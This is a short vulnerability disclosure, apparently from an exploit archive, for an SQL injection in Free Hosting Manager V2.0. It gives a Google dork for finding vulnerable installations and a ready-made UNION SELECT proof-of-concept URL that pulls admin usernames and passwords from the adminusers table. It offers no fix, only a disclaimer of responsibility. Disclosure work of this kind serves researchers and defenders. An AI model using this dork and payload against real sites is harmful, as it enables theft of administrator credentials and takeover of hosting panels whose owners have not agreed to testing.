16 lines
No EOL
923 B
Text
16 lines
No EOL
923 B
Text
##########################################################################
|
|
## Free Hosting Manager V2.0 SQL Injection Vulnerability
|
|
## Google Dork: inurl:clients/packages.php?id=1
|
|
## Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>
|
|
## Date: 29/11/2012
|
|
## Version: 2.0
|
|
## Software Link: http://www.fhm-script.com/download.php
|
|
## ISRAEL
|
|
##########################################################################
|
|
## Author will be not responsible for any damage.
|
|
##########################################################################
|
|
## SQL Injection PoC:
|
|
## http://www.example.com/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23
|
|
##########################################################################
|
|
# 0x31337.net
|
|
########################################################################## |